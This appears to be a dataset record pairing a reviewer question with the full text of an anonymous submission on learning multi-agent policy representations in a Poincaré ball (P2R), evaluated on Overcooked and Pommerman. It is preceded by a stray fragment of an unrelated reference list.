Inf. Proc. Sys. (NeurIPS)*, 2020. Zahra Ghodsi, Nandan Kumar Jha, Brandon Reagen, and Siddharth Garg. Circa: Stochastic relus for private deep learning. In *Adv. Neural Inf. Proc. Sys. (NeurIPS)*, 2021. A Hassani, S Walton, N Shah, A Abuduweili, J Li, and H Shi. Escaping the big data paradigm with compact transformers. *arXiv preprint arXiv:2104.05704*, 2021. Dan Hendrycks and Kevin Gimpel. Gaussian error linear units (gelus). *arXiv preprint arXiv:1606.08415*, 2016. Geoffrey Hinton, Oriol Vinyals, and Jeff Dean. Distilling the knowledge in a neural network. *arXiv preprint arXiv:1503.02531*, 2015. Nandan Kumar Jha, Zahra Ghodsi, Siddharth Garg, and Brandon Reagen. DeepReDuce: Relu reduction for fast private inference. In *Proc. Int. Conf. Machine Learning*, 2021. Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014. Vladimir Kolesnikov and Thomas Schneider. Improved garbled circuit: Free xor gates and applications. In *Automata, Languages and Programming: 35th International Colloquium, ICALP 2008, Reykjavik, Iceland, July 7-11, 2008, Proceedings, Part II* 35, pp. 486–498. Springer, 2008. Alex Krizhevsky, Geoffrey Hinton, et al. Learning multiple layers of features from tiny images. Technical report, U. Toronto, 2009.
2DJUXmHZ2O
Does the tree architecture described for trajectories for MDPs extend in a straightforward way to multi-agent systems with different information structures. Is it assumed that each agent sees a different tree from its own perspective?
GENERALIZING POINCARÉ POLICY REPRESENTATIONS IN MULTI-AGENT REINFORCEMENT LEARNING Anonymous authors Paper under double-blind review ABSTRACT Learning policy representations is essential for comprehending the intricacies of agent interactions and their decision-making processes. Recent studies have found that the evolution of any state under Markov decision processes (MDPs) can be divided into multiple hierarchies based on time sequences. This conceptualization resembles a tree-growing process, where the policy and environment dynamics determine the possible branches. In this paper, the multiple agent’s trajectory growing paths can be projected into a Poincaré ball, which requires the tree to grow from the origin to the boundary of the ball, deriving a new geometric idea of learning Poincaré Policy Representations (P2R) for MARL. Specifically, P2R captures the policy representations of Poincaré ball by a hyperbolic neural network and constructs a contrast objective function that encourages embeddings of the same policy to move closer together while embeddings of different policies to move apart, which enables embed policies with low distortion. Experimental results provide empirical evidence for the effectiveness of the P2R framework in cooperative and competitive games, demonstrating the potential of Poincaré policy representations for optimizing policies in complex multi-agent environments. 1 INTRODUCTION Multi-agent reinforcement learning (MARL) is widely used in a variety of applications, ranging from robotics (Kober et al., 2013) and autonomous vehicles (Shalev-Shwartz et al., 2016) to real-time strategy games (Vinyals et al., 2019), social networks (Chen et al., 2020b), and economic markets (Qiu et al., 2021). In MARL, agents interact with each other and their environment to learn effective policies. One of the key challenges in MARL is learning effective representations of the agents’ policies, which need to capture the characters of the policies and dynamics of the system that enable efficient decision-making. Furthermore, policy representations in MARL are crucial to realize cooperation among agents, improve the performance and efficiency of the multi-agent system, and adapt to different tasks and environments. Many recent works have been devoted to learning informative representations for agent policies using deep learning architectures for reinforcement learning (RL) (Albrecht & Stone, 2018; Papoudakis et al., 2021; Rabinowitz et al., 2018). He et al. (2016) introduced a novel method that focuses on the learning of a modeling network tasked with reconstructing the actions of a modeled agent based on its observations. Grover et al. (2018) put forward an innovative approach that relies on imitation learning where they train a mapping from observations to actions in a supervised manner to capture a point-based policy representation. Raileanu et al. (2018) contributed to the field by developing an algorithm designed to learn the inference of an agent’s intentions by leveraging the policy of the controlled agent. Tacchetti et al. (2018) introduced a notable concept involving relational forward models that utilize graph neural networks for modeling agents. Zintgraf et al. (2021) employed a Variational Autoencoder (VAE) for agent modeling, particularly for fully-observable environments. tasks. However, the aforementioned policy representation methods assume that the trajectory data structure has Euclidean property with state linear transformation, and we notice that trajectory data has an implicit hierarchical property, which induces tree-like state evolution. We thus consider a different structure, and further find the evolution of any state of Markov decision processes (MDPs) \cite{Puterman2014} can be divided into multiple hierarchies. This conceptualization resembles a tree-growing process, where the policy and environment dynamics determine the possible branches. These hierarchical evolution relationships are nonlinear by the randomness of the environment dynamic and the police, making hierarchy a natural basis to encode information for MARL. In this work, we assume the agent policies are black boxes, that is, we can only access them based on the interaction data with the environment, which we utilize to learn policy representations. Accordingly, learning effective policy representations should prioritize capturing precisely hierarchically-structured features of the trajectories. Specifically, we leverage any state as the root of the tree structure and construct trees, as shown in Figure 1. The growth space and direction of the trees are determined by the action distribution of the policy and the environment randomness at each time step. The trees formed by the trajectories of different policies exhibit distinct characteristics, such as the width and depth of the left and right subtrees. Furthermore, the enclosing geometry of the Poincaré ball is precisely exponential growth from the origin to the boundary, which enables embedding the hierarchical tree-like trajectories with low distortion \cite{Sarkar2011}. In this paper, we model the trajectories of multi-agent interaction with each other and their environment as the growth process of a tree and describe the tree-like trajectory data in a Poincaré ball. We embed the any state of a trajectory in the central region of the Poincaré ball, and as the agent interacts with the environment, the tree grows from the central region toward the edge of the ball. Specifically, we propose a novel framework (P2R) to learn policy representations in Poincaré ball for multi-agents. P2R captures the policy representations of Poincaré ball by a hyperbolic neural network and constructs a contrast objective function that encourages embeddings of the same policy to move closer together while embeddings of different policies to move apart. **Superiority of Poincaré Policy Representations.** The experimental results demonstrate the effectiveness of the P2R framework in both cooperative and competitive environments. These remarkable findings emphasize the tremendous potential of Poincaré policy representations and illuminate the path to enhancing policy optimization in complex multi-agent environments. ## 2 Preliminaries ### Reinforcement Learning The traditional formulation of the reinforcement learning (RL) problem revolves around the concept of a Markov Decision Process (MDP), defined by the tuple $M = (S, A, P, R, \gamma)$ where $S$ and $A$ stand for the state space and action space respectively, while $R(s, a)$ represents the reward function. The transition dynamics, denoted as $P(s'|s, a)$, dictate how the environment’s state evolves, and the discount factor $\gamma \in [0, 1)$ quantifies the agent’s inclination towards earlier rewards. Within this framework, we introduce a stochastic policy $\pi_\theta$ that depends on a parameter vector $\theta$. The interaction between this policy and the environment leads to the creation of a trajectory $\tau$, which can be expressed as a sequence of state-action pairs: $\tau = \{(s_t, a_t)\}_{t=1}^T$, with $T$ representing the maximum time step in an episode. The agent’s ultimate goal is to learn a policy that maximizes its expected discounted accumulative rewards over trajectories: $$\arg\max_\theta \mathbb{E}_{\tau \sim \pi_\theta, P} \left[ \sum_{t=0}^\infty \gamma^t R(s_t, a_t) \right].$$ (1) It’s important to note that this formulation seamlessly extends to multi-agent scenarios. ### Poincaré Geometry A hyperbolic space $\mathbb{H}^n$ represents an $n$-dimensional Riemannian manifold with constant negative sectional curvature $-c$. Beltrami \cite{Beltrami1868} established the equiconsistency of hyperbolic and Euclidean geometry, introducing the renowned Poincaré ball model named after its re-discoverer. The Poincaré ball $(\mathbb{B}^n, g^\mathbb{B})$ is defined by the manifold $\mathbb{B}^n = \{x \in \mathbb{R}^n | \|x\| < 1\}$ equipped with the Riemannian metric tensor $g^\mathbb{B}_x = \lambda_x^2 g^E$, where $\lambda_x := \frac{2}{1-\|x\|^2}$ is the conformal factor and $g^E$ denotes the Euclidean metric tensor. The Poincaré ball model provides a geodesic distance for vector \( x, y \in \mathbb{B}^n \): \[ d_{\mathbb{B}}(x, y) = \cosh^{-1} \left( 1 + 2 \frac{\|x - y\|^2}{(1 - \|x\|^2)(1 - \|y\|^2)} \right). \] Hyperbolic geometry does not like the Euclidean vector space which invokes the affine vector operations such as the summation, multiplication, etc. To address this issue, we follow Ganea et al. (2018), Shimizu et al. (2020), and utilize the framework of gyrovector spaces as introduced by Ungar (2022) to extend common vector operations into hyperbolic space. The curvature of Poincaré ball is modified by \( c \), Poincaré ball is then defined as \( \mathbb{B}_c^n = \{ x \in \mathbb{R}^n | c\|x\|^2 < 1, c \geq 0 \} \). The corresponding conformal factor takes the form \( \lambda_c := \frac{1}{1-c\|x\|^2} \). **Möbius addition.** Given a curvature \(-c\) of \( \mathbb{B}_c^n \) and \( x, y \in \mathbb{B}_c^n \), the Möbius addition is defined as: \[ x \oplus_c y = \frac{(1 + 2c\langle x, y \rangle + c\|y\|^2)x + (1 + c\|x\|^2)y}{1 + 2c\langle x, y \rangle + c^2\|x\|^2\|y\|^2}. \] **Exponential and logarithmic maps.** The exponential map \( \exp_x^c \) is a function from tangent space \( T_x \mathbb{B}_c^n \cong \mathbb{R}^n \) to \( \mathbb{B}_c^n \), which provides a way of mapping vectors from the Euclidean space to hyperbolic space. Given \( x, y, v \in \mathbb{B}_c^n \), the exponential map \( \exp_x^c \) is defined by: \[ \exp_x^c(v) := x \oplus_c \left( \tanh \left( \sqrt{-c\lambda_c}\|v\| \right) \frac{v}{\sqrt{c\|v\|}} \right). \] The reverse process of exponential map is the logarithmic map, which is defined as: \[ \log_x^c(y) := \frac{2}{\sqrt{c\lambda_c}} \text{arctanh}(\sqrt{c}\| - x \oplus_c y \|) \frac{-x \oplus_c y}{\|-x \oplus_c y\|}. \] **Parallel transport.** Let \( T_x \mathbb{B}_c^n \) be the tangent space to vector \( x \in \mathbb{B}_c^n \), the parallel transport establishes a linear isometric mapping between two tangent spaces, that is, relocating a tangent vector \( y \in T_0 \mathbb{B}_c^n \) to \( T_x \mathbb{B}_c^n \) via vector affine operations. This process includes mapping \( y \) into \( \mathbb{B}_c^n \) through the exponential map, then transitioning to the point \( x \) using Möbius addition \( \oplus_c \), and finally mapping into \( T_x \mathbb{B}_c^n \) via logarithmic operation. The parallel transport is given by the following isometry: \[ P_{0 \rightarrow x}^c(y) = \log_x^c(x \oplus_c \exp_0^c(y)) = \frac{\lambda_c}{\lambda_x} y. \] Through parallel transport, we can establish a connection between two distinct tangent spaces. ### 3 POINCARÉ POLICY EMBEDDINGS In this work, we assume that the agent policies are black boxes, that is, our access to the policies is solely through interaction data with the environment. Drawing inspiration from prior research, specifically Grover et al. (2018) and Papoudakis et al. (2021), we recognize that trajectories, composed of state-action pairs, inherently convey the policy’s characteristics. Leveraging trajectories as a means to acquire policy embeddings proves to be an effective strategy. To formalize this, our objective is to learn policy embeddings for each agent, denoted as \( f_\Theta : E_\alpha \rightarrow \mathbb{B}^n \), where \( E_\alpha \) represents the space of episode trajectories \( \tau_\alpha \) associated with agent \( \alpha \) during interactions with other agents and the environment, \( n \) signifies the dimensionality of the embeddings, and \( \Theta \) denotes the function’s parameters. These trajectories exclusively consist of state-action pairs for agent \( \alpha \). Specifically, \( \Theta = \{ \Theta_1, ..., \Theta_L \} \) refers to the parameters of the hyperbolic neural network, with each layer \( \Theta_l \) encompassing weight parameters \( \Theta_l^W \) and bias parameters \( \Theta_l^b \). Accordingly, for MARL, we introduce the following auxiliary tasks for learning an agent’s policy representation: - **1. Policy representation.** The policy embeddings should possess the capability to capture hierarchical information. We project the trajectories into hyperbolic space and employ hyperbolic fully-connected (FC) neural networks for policy representation learning. 2. Policy discrimination. The obtained policy embeddings should be adept at distinguishing an agent’s policy from those of other agents. To achieve policy discrimination, we leverage distance metrics within the Poincaré ball. Embeddings acquired from different trajectories but corresponding to the same policy should be proximate in the embedding space, while embeddings for distinct policies should exhibit greater separation. 3.1 Obtain policy representations in Poincaré ball We propose a method for obtaining policy embeddings within the Poincaré ball. To ensure minimal distortion, we first project trajectories into the Poincaré ball, and subsequently, we use a hyperbolic neural network to learn policy representations from the projected trajectories. We suppose the episode trajectory space $E_\alpha = \{\tau^k_\alpha\}_{k=1}^K$ of agent $\alpha$ comprising $K$ trajectories. Since trajectories are situated within Euclidean space, and we need to learn policy embeddings in a hyperbolic space. To bridge the gap between Euclidean trajectories $\tau^k_\alpha$ with dimensionality $m$ and the hyperbolic space $\mathbb{H}^m$, we employ the exponential map from the origin of the Poincaré ball to project $\tau^k_\alpha$ in hyperbolic space. We denote the result of mapping $\tau^k_\alpha$ into the hyperbolic space as $\hat{\tau}^k_\alpha$, and this procedure is formally defined as follows: $$\hat{\tau}^k_\alpha = \exp_0(\tau^k_\alpha) = \tanh \left( \sqrt{c} \|\tau^k_\alpha\| \right) \frac{\tau^k_\alpha}{\sqrt{c} \|\tau^k_\alpha\|}. \quad (7)$$ Subsequently, we employ hyperbolic neural networks to extract hierarchical relationships and other essential features embedded within these trajectories. This approach ensures a high capacity to capture complex structures and extracts tree-like properties within the hyperbolic space. Specifically, we leverage the Möbius matrix-vector multiplication (Ganea et al., 2018) to define hyperbolic neural networks. Considering the $l$ layer, given the weight parameters $\Theta^M_l \in M_{n,m}(\mathbb{R}) : \mathbb{R}^m \to \mathbb{R}^n$ is a linear map, which we identify with its matrix representation, then $\forall (\hat{\tau}^k_\alpha) \in B^n_c$, we have: $$\Theta^M_l \otimes_c \hat{\tau}^k_\alpha = (1/\sqrt{c}) \tanh \left( \frac{\|\Theta^M_l \hat{\tau}^k_\alpha\|}{\|\hat{\tau}^k_\alpha\|} \tanh^{-1}(\sqrt{c} \|\hat{\tau}^k_\alpha\|) \right) \frac{\Theta^M_l \hat{\tau}^k_\alpha}{\|\Theta^M_l \hat{\tau}^k_\alpha\|}. \quad (8)$$ Biases are introduced into the hyperbolic neural networks, and these bias translations of the Poincaré ball are naturally achieved by moving along geodesics. We leverage the parallel transport to give the Möbius translation of $\hat{\tau}^k_\alpha \in B^n_c$ by the $l$ layer bias parameters $\Theta^b_l \in B^n_c$, $$\hat{\tau}^k_\alpha \oplus_c \Theta^b_l = \exp^c_{\hat{\tau}^k_\alpha}(P^c_{0 \to \hat{\tau}^k_\alpha}(\log_0(\Theta^b_l))) = \exp^c_{\hat{\tau}^k_\alpha} \left( \frac{\lambda^c_{\hat{\tau}^k_\alpha}}{\lambda^c_{\hat{\tau}^k_\alpha}} \log_0(\Theta^b_l) \right). \quad (9)$$ Finally, the unified form of the hyperbolic neural network encompasses multiple layers and integrates Equation (7), Equation (8), and Equation (9). Mathematically, it can be expressed as: $$f_{\Theta^l}(\tau^k_\alpha) = \varphi_l(\Theta^M_l \otimes_c (\exp_0(\tau^k_\alpha)) \oplus_c \Theta^b_l), \quad (10)$$ where $\varphi_l$ represents the pointwise non-linearity of the $l$-th layer. In Equation (10), the trajectory $\tau^k_\alpha$ undergoes a series of operations. Initially, it is mapped into the Poincaré ball using the exponential map. Subsequently, it undergoes a transformation based on weight parameters represented as $\Theta^M_l$. Next, it is further adjusted based on bias parameters denoted as $\Theta^b_l$, and finally, a non-linear transformation is applied through $\varphi_l$. These steps are applied in each layer of the hyperbolic neural network, effectively enabling the network to capture hierarchical features of the trajectories. 3.2 Consistent policy representations for each agent Policy embeddings derived from distinct trajectories of the same policy must maintain consistency, signifying the adherence to common policy characteristics, and should exhibit proximity within the embedding space. To ensure the consistency among policy embeddings obtained from different trajectories of the same policy, we compute the distance between policy embeddings using the distance equation within the Poincaré ball, as defined in Equation (2). Subsequently, we define a consistency objective function based on this distance measure: \[ L_{\text{con}}(\Theta) = \frac{1}{A} \sum_{\alpha=1}^{A} \mathbb{E}_{k \neq k'} \left[ \log \left( 1 + \frac{d_B(f_\Theta(\tau^k_\alpha), f_\Theta(\tau^{k'}_\alpha))}{\epsilon} \right) + \mu \left( \log \frac{1}{1 - \|f_\Theta(\tau^k_\alpha)\|} \right) \right], \] where \(1 \leq k, k' \leq K\), \(A\) denotes the number of agents, \(\epsilon\) serves as an adjustment parameter, and \(\mu\) is the regularization coefficient. Employing the logarithm effectively scales down the calculated distances and norms within the policy embedding in the Poincaré ball, resulting in smoother data without altering the fundamental nature of the data or its relationships. The term on the left side of the plus sign is designed to minimize the Poincaré distance between sample points. The denominator includes an adjustment parameter \(\epsilon\) to amplify the distance between the two embeddings based on different task data. The term on the right side of the plus sign aims to minimize the embedding point within the bounds of the radius in the Poincaré ball. Placing the norm in the denominator ensures that the result remains positive when taking the logarithm. By minimizing the distance between embeddings obtained from different trajectories of the same policy, we obtain clusters of distinct embeddings of the same policy within the embedding space. This process accentuates the common characteristics of the policy. 3.3 Discriminative Representations Between Multiple Agents Policies inherently exhibit diverse action distributions given the same state, leading to distinct characteristics in their trajectories. Policy discrimination stems from the varying action preferences exhibited by different policies, leading to distinctive characteristics in their respective trajectories during interactions with both the environment and other agents. Hence, it becomes imperative for policy embeddings to clearly portray these distinctions among different policies. These distinctions naturally surface in the embedding space, necessitating that embeddings of dissimilar policies possess well-defined boundaries. To fulfill this criterion, we take measures to achieve that embeddings of distinct policies are significantly separated within the Poincaré ball. Similarly, we employ the distance calculation formula within the Poincaré ball, as defined in Equation (2), to quantify the dissimilarity between policy embeddings generated from trajectories of different agents. Based on this distance measure, we construct the discriminative objective function: \[ L_{\text{dis}}(\Theta) = \frac{1}{A} \sum_{\alpha \neq \alpha'} \mathbb{E}_k \left[ \log \left( 1 + \frac{d_B(f_\Theta(\tau^k_\alpha), f_\Theta(\tau^{k'}_\alpha'))}{\epsilon} \right) \right], \] where \(A\) and \(\epsilon\) also denote the number of agents and an adjustment parameter, respectively. Within Equation (12), the application of the logarithm operation and the incorporation of \(\epsilon\) in the denominator follow the identical rationale as delineated in Equation (11). Therefore, by maximizing the distance between embeddings derived from distinct agents’ trajectories, we establish clear boundaries among embeddings of different policies. 3.4 Ensemble Consistent-Discriminative Representations The consistency objective achieves that policy embeddings derived from different trajectories of the same agent exhibit clustering tendencies in the embedding space. Conversely, the discriminative objective aims to maximize the separation between policy embeddings of different agents within the embedding space. These two objectives complement each other, and we introduce an ensemble approach that integrates both of them. Specifically, to estimate parameters \(\Theta\) for policy representation function \(f_\Theta\), we solve the optimization problem by the total objective function, which combines the above Equation (11) and Equation (12): \[ L_{\text{ens}} = L_{\text{con}} + \beta L_{\text{dis}}, \] where \(\beta\) is a trade-off hyperparameter that controls the relative weights of the consistent and discriminative terms. We train policy representation function by optimizing Equation (13) via stochas- tic Riemannian optimization methods RSGD (Bonnabel, 2013). The algorithm for the proposed P2R method is presented in Appendix A.1. 4 EXPERIMENTS 4.1 MULTI-AGENT ENVIRONMENTS We evaluate the performance of our method P2R in two multi-agent environments (one cooperative, one competitive): Overcooked (Carroll et al., 2019), and Pommerman (Resnick et al., 2018). These environments impose stringent demands on the sequencing of agent actions, exhibiting a pronounced hierarchical structure in the state evolution. More details about the experiments and additional experiments are presented in Appendix B. Cooperative The Overcooked environment, as shown in Figure 2, is a simplified version of the popular video game Overcooked (Ghost Town Games, 2016). Within this environment, two agents assume the roles of chefs in a kitchen tasked with cooking and serving dishes. The kitchen contains only three types of objects: onions (yellow), dishes (white), and a cooking pot (dark grey). The task involves agents placing three onions in the pot, allowing them to cook for a duration of 20 timesteps, transferring the resulting soup into a dish (white), and subsequently serving it (light grey), giving all players a reward of 20. The primary objective is to deliver the soup as many times as possible within the time limit. The agents are equipped with six distinct actions: moving up, moving down, moving left, moving right, taking no action (noop), and ”interact,” which triggers specific actions based on the tile the player is facing, e.g. placing an onion on a counter. A pivotal aspect of the challenges presented in the Overcooked environments is the necessity for agents to possess a keen understanding of their partner’s policy characteristics and execute effective coordination accordingly. Figure 2: Overcooked environment layouts. From left to right: Cramped Room confines the agents to a tight space, increasing the likelihood of agent collisions. Asymmetric Advantages tests whether agents can devise high-level strategies that capitalize on their individual strengths. In Coordination Ring, agents must effectively coordinate their movements to traverse between the bottom left and top right corners of the kitchen. Forced Coordination compels agents to formulate a comprehensive joint strategy since neither player can independently serve a dish. Counter Circuit involves a non-obvious coordination strategy, where onions are passed over the counter to the pot rather than being carried around. Each layout is equipped with one or more onion dispensers and dish dispensers, providing an unlimited supply of onions and dishes, respectively. Pommerman The Pommerman environment draws its inspiration from the classic console game Bomberman (W, 1983). In our experiments, we utilize the simulator configured for two agents whose initial positions are randomized close to any of the 4 corners of the board, as depicted in Figure 3. At each time step, each agent has the option to choose from six possible actions: movement in any of the four directions, staying in place, or placing a bomb. The environment consists of cells that can be passages, rigid walls (dark brown cells), or wood (light brown cells), with maps being randomly generated. Importantly, there is always a guaranteed path between any two agents on the map. The objective of the task is to be the last agent standing, earning a reward of 1 for victory, while tie games result in an episodic reward of -1. When an agent places a bomb, it explodes after 10 time steps, producing flames that last for 2 time steps. These flames have the ability to destroy wood and kill agents within their blast radius. The destruction of wood can reveal either a passage or a power-up (yellow circles). Power-ups fall into three categories: those that increase the blast radius of bombs, those that increase the number of bombs an agent can place, and those that grant the ability to kick bombs. An episode of two-player Pommerman is finished when an agent dies or when reaching 800 timesteps. 4.2 Baselines **Local Information Agent Modelling (LIAM)** (Papoudakis et al., 2021): This baseline presents an encoder-decoder agent modeling method capable of extracting concise yet informative representations of modeled agents, relying solely on the local information available to the controlled agent (including its local state observations and past actions). We include LIAM for two reasons: it employs a recurrent encoder for policy representation learning and leverages local state observations in a manner akin to P2R. Through the results, we can compare the performance of memory modeling based on recurrent encoders with tree-like hierarchical modeling in the Poincaré ball. **Agent Policy Representation Framework (AMF)** (Grover et al., 2018): This baseline introduced an inventive approach centered on imitation learning, where a supervised training scheme is employed to map observations to actions, thereby capturing a point-based policy representation. In contrast to P2R, which learns policy representations in the Poincaré ball, AMF operates in Euclidean space. We can observe whether the policy embeddings within the Poincaré ball, as obtained by P2R, result in better performance. All baselines are trained with PPO algorithm (Schulman et al., 2017). **Contrastive Agent Representation Learning (CARL):** This baseline is inspired by (Papoudakis et al., 2021) and is a non-reconstruction baseline based on contrastive learning (Oord et al., 2018). CARL utilizes the trajectories of modeled agents during training but restricts execution to solely the trajectories of the controlled agent. Further implementation details for this baseline can be found in Appendix B.4. We included this baseline because the method is a non-reconstructive method that embraces the concept of contrast and employs trajectory-based learning for policy representations. 4.3 Experiment Results **Cooperative** Figure 4 shows the mean episode rewards of all methods during training in the five Overcooked environment layouts. These layouts necessitate specific sequences of actions from the agents and display a state evolution resembling a hierarchical tree-like structure. Our experimental results also validate the effectiveness of our P2R method in learning policy embeddings within the Poincaré ball. It excels at extracting hierarchical information from agent trajectories, resulting in more effective policy embeddings. Furthermore, these policy embeddings encapsulate a richer set of information, which proves advantageous for the decision-making processes of agents. ![Figure 4](image) (a) Cramped Rm. (b) Asymm. Adv. (c) Coord. Ring (d) Force Coord. (e) Counter Circ. | Method | P2R-PPO | LIAM-PPO | AMF-PPO | CARL-PPO | PPO | |-----------------|---------|----------|---------|----------|-----| Figure 4: Average episode rewards on each layout of the Overcooked environment during training, shaded regions indicate the standard deviation over five training seeds. **Cramped Room:** In this layout, two agents are prone to collisions in the confined space. If agents perceive their teammate’s behavioral characteristics, they will adjust their strategies based on their teammate’s actions to minimize collisions while completing the task. As shown in Figure 4(a), P2R-PPO typically results in one agent learning to complete the task faster in the initial approximately 100 iterations of the experiment while the other agent remains inactive, causing minimal interference. The P2R policy embeddings quickly learn the characteristics of the teammate’s policy, and both agents operate without interference from each other, resulting in high scores in the initial stages. As the training process progresses, the previously inactive agent also attempts to complete the task, leading to collisions in the confined space, reducing task efficiency. The P2R policy embeddings provide behavioral features, such as action execution sequences, for both agents, encouraging faster cooperation. In contrast, other baselines exhibit a more stable learning process, but even in the initial stages, significant interference between the two agents occurs. **Asymmetric Advantages:** In this layout, two agents need to learn how to allocate the use of the two pots. If both agents only choose one pot, it leads to inefficient task completion. Therefore, the policy embeddings need to include sufficient hierarchical action information, including the order in which agents select pots, the frequency of pot usage, and time allocation, among others. As shown in Figure 4(b), P2R-PPO learn policy embeddings in the Poincaré ball demonstrate better performance. **Coordination Ring:** The training process in this layout is similar to that in the *Cramped Room*, as depicted in Figure 4(c). Our P2R-PPO method learns policy embeddings that extract more information about action hierarchy and action sequence relationships, enabling the agents to quickly learn to avoid collisions and efficiently complete tasks. **Forced Coordination:** In this layout, the right agent handles two pots and soup delivery while the left agent is responsible for providing onions and plates, the essence of the challenge lies in the coordination of action execution sequences between the two agents. Moreover, due to the limited positions at the central interaction counter (only three positions), the left agent needs to provide the corresponding raw materials based on the right agent’s soup delivery, and the right agent must adjust the order of cooking and delivery based on the sequence of raw materials provided by the left agent. As shown in Figure 4(d), P2R-PPO demonstrates better performance that enables the agents to learn to cooperate more quickly. Furthermore, the agents even learn a form of “laziness” to some extent during training. For a period of time, the left agent places multiple onions and plates on the counter, and the right agent takes them one by one, causing both agents to constantly shuttle between their respective corridors. However, the left agent eventually learns to place one onion or plate at a time in the grid next to the pot, and the right agent learns to take raw materials only from the nearest grid. This is because P2R’s policy embeddings effectively capture the hierarchical characteristics of the behavior of the agent on the right side, and the agent on the left side has learned to “slack off” by utilizing the information provided by the policy embeddings. **Counter Circuit:** In this layout, the most efficient cooperative policy involves passing onions through the central counter instead of both agents continuously circling the ring. As illustrated in Figure 4(e), the two agents using our P2R policy embeddings learn each other’s action hierarchy characteristics, significantly improving cooperation efficiency. **Competitive** In *Pommerman* experiment, agents move to positions that could potentially eliminate their opponents by placing bombs and then quickly retreating. This results in repeated action sequences that exhibit clear hierarchical action patterns, and the evolution of states also demonstrates a tree-like hierarchical structure. To test the effectiveness of policy embeddings, we combine the opponent’s embeddings with the current state as the input for the agent. If the learned opponent’s policy embeddings are effective, the agent, when making action selections, will take into account the characteristics of the opponent’s policy. If the opponent’s policy is ineffective, the current agent cannot obtain information about the opponent, which will directly reflect in the win rate results. We conducted two sets of experiments: (1) comparing the win rates of all baselines combined with PPO against the naive PPO algorithm and (2) comparing the win rates between all baselines (include naive PPO) after training for 1000 iterations, and all baselines are combined with PPO. In terms of winning rates, the combination of the PPO algorithm with policy embeddings learned by P2R achieved the highest winning rates in both sets of experiments. This demonstrates that learning policy embeddings within the Poincaré ball is more effective at capturing hierarchical information. The average win rates of baseline agents against naive PPO agents across five training seeds are shown in Figure 5. In the initial stages of the training process, policies are busy exploring the environment and have not yet exhibited hierarchical state evolution characteristics. Therefore, there is not enough information provided for P2R to learn hierarchical characteristics. As the training process progresses, all baseline methods effectively learn the characteristics of the opponent’s policy, with P2R method showing superior performance. Moreover, agents in adversarial matches tend to exhibit certain patterns, meaning that policies reveal some habitual action sequences. When P2R method captures such characteristics, it outperforms other methods when combined with PPO, resulting in higher win rates. The win rates between all baselines (include naive PPO) after training for 1000 iterations are shown in Figure 6. By comparing the win rates between each baseline and P2R, we observe that our P2R method achieves higher win rates (over 50%) against other algorithms. In competitive environments where action sequences exhibit strong hierarchical characteristics and state evolution resembles tree-like growth, learning policy embeddings in the Poincaré space proves effective in capturing the hierarchical features of policies, thereby enhancing the decision-making process. 4.4 EMBEDDING ANALYSIS We qualitatively visualize the policy embeddings learned by P2R via HoroPCA (Chami et al., 2021). As shown in Figure 7, for 10 test interaction episodes of 5 randomly selected agents in the initial cases and after trained cases of the Forced Coordination of Overcooked and Pommerman, respectively. The policy embedding visualizations of other environments are in Appendix B.2. (a) Forced Coord. initial (b) Forced Coord. trained (c) Pommerman initial (d) Pommerman trained Figure 7: Policy embeddings obtained by P2R for 10 test episodes involving 5 randomly selected agents are visualized using HoroPCA for two different environments. Each color represents a distinct agent policy. Intuitively, policy embeddings of the same agent tend to cluster together in space, while those of different agents are dispersed, indicating that P2R effectively captures diverse policy features and exhibits strong discriminative power in policy representation. The initial policy embeddings in the Poincaré ball are scattered within a certain region. After training, the P2R method distinctly separates the ten policy for each of the five agents into five clusters. 5 CONCLUSION In conclusion, this paper presents a novel framework for multi-agent reinforcement learning (MARL) based on a new geometric policy representation perspective from the non-Euclidean hyperbolic projection. By leveraging the hierarchical structure inherent in Markov decision processes (MDPs), our approach projects the trajectories of multiple agents onto a Poincaré ball, enabling policy representations that are both efficient and effective. Our key innovation lies in modeling the policy representation as a tree-growing process from the centric Poincaré ball to its boundary. To enhance this hierarchical property for further geometric generalization, we design a contrastive objective function that encourages consistent policies to be embedded closer together in the hyperbolic space, while pushing inconsistent policies farther apart. This leads to representing those policies with low distortion using only a few dimensions, demonstrating the geometric expression of hyperbolic embeddings in MARL. Experimental results showcase the superiority of our P2R framework over state-of-the-art methods across cooperative and competitive games. These findings emphasize the potential of non-Euclidean policy representations for improving the performance and scalability of control policies in complex multi-agent environments. REFERENCES Stefano V Albrecht and Peter Stone. Autonomous agents modelling other agents: A comprehensive survey and open problems. *Artificial Intelligence*, 258:66–95, 2018. Eugenio Beltrami. Teoria fondamentale degli spazii di curvatura costante. *Annali di Matematica Pura ed Applicata (1867-1897)*, 2:232–255, 1868a. Eugenio Beltrami. *Teoria fondamentale degli spazii di curvatura costante memoria*. F. Zanetti, 1868b. Thomas Bläsius, Tobias Friedrich, Anton Krohmer, and Sören Laue. Efficient embedding of scale-free graphs in the hyperbolic plane. *IEEE/ACM transactions on Networking*, 26(2):920–933, 2018. Silvere Bonnabel. Stochastic gradient descent on riemannian manifolds. *IEEE Transactions on Automatic Control*, 58(9):2217–2229, 2013. James W Cannon, William J Floyd, Richard Kenyon, Walter R Parry, et al. Hyperbolic geometry. *Flavors of geometry*, 31(59-115):2, 1997. Micah Carroll, Rohin Shah, Mark K Ho, Tom Griffiths, Sanjit Seshia, Pieter Abbeel, and Anca Dragan. On the utility of learning about humans for human-ai coordination. *Advances in neural information processing systems*, 32, 2019. Edoardo Cetin, Benjamin Chamberlain, Michael Bronstein, and Jonathan J Hunt. Hyperbolic deep reinforcement learning. *arXiv preprint arXiv:2210.01542*, 2022. Ines Chami, Albert Gu, Dat P Nguyen, and Christopher Ré. Horopca: Hyperbolic dimensionality reduction via horospherical projections. In *International Conference on Machine Learning*, pp. 1419–1429. PMLR, 2021. Ting Chen, Simon Kornblith, Kevin Swersky, Mohammad Norouzi, and Geoffrey Hinton. Big self-supervised models are strong semi-supervised learners. In *Advances in Neural Information Processing Systems*, 2020a. Yang Chen, Jiamou Liu, He Zhao, and Hongyi Su. Social structure emergence: A multi-agent reinforcement learning framework for relationship building. In *Proceedings of the 19th International Conference on Autonomous Agents and MultiAgent Systems*, pp. 1807–1809, 2020b. Andrej Cvetkovski and Mark Crovella. Hyperbolic embedding and routing for dynamic graphs. In *IEEE INFOCOM 2009*, pp. 1647–1655. IEEE, 2009. Bhuwan Dhingra, Christopher Shallue, Mohammad Norouzi, Andrew Dai, and George Dahl. Embedding text in hyperbolic spaces. In *Proceedings of the Twelfth Workshop on Graph-Based Methods for Natural Language Processing 